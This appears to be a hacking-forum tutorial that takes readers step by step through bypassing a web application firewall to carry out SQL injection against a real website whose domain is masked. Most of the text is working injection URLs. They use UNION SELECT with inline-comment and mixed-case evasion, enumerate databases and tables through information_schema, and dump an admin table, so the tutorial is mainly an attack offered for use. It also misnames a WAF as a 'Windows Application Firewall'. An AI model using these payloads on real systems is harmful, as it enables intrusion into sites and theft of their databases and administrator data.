SQL Injection; Basic WAF bypass

SALAM Brothers :) 
I'm bringing this tutorial to show you how to Bypass WAF(Windows Application Firewall)

You have found your SQLi vulnerable site, you found how many columns it has (in this case 60)

You do the regular command:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​​​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ​,​5​7,58,59,60--

The website returns this error message:

[Image: screenshot_5.png]


What you would like to do now is you use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​​​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ​,​5​7,58,59,60--

And now the website returns this:

[Image: screenshot_6.png]

Ok now we will try to add version(),database() and user() in one line like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('TheHacker+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3 ​​a),5​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ​,​32,33​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 ​,5​8,59,6​0--

The website returns this:


[Image: screenshot_7.png]

We would now like to make "concat" both upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('TheHacker+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3 ​​a),5​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ​,​32,33​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 ​,5​8,59,6​0--

Now for the good part; lets try to find all the databases, here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​​​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ​,​4​9,50,51,52,53,54,55,56,57,58,59,60 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​​​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ​,​4​9,50,51,52,53,54,55,56,57,58,59,60 from information_schema.schemata--

The website returns:

[Image: screenshot_8.png]

now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​​​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, ​4​9​,50,51,52,53,54,55,56,57,58,59,60 from information_schema.tables where table_schema=database()--

The website returns:

[Image: screenshot_9.png]

Now you have to in some way comment out information_schema or tables, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​​​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, ​4​9​,50,51,52,53,54,55,56,57,58,59,60 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: screenshot_10.png]

It's the same to get columns, you know the drill.

If you now want to dump columns id from admin table you do like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ​​​ ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ​,​5​2,53,54,55,56,57,58,59,60 from admin--

ATTENTION : This is only BASIC WAF bypass, the techniques are endless.


Hope I helped you Shy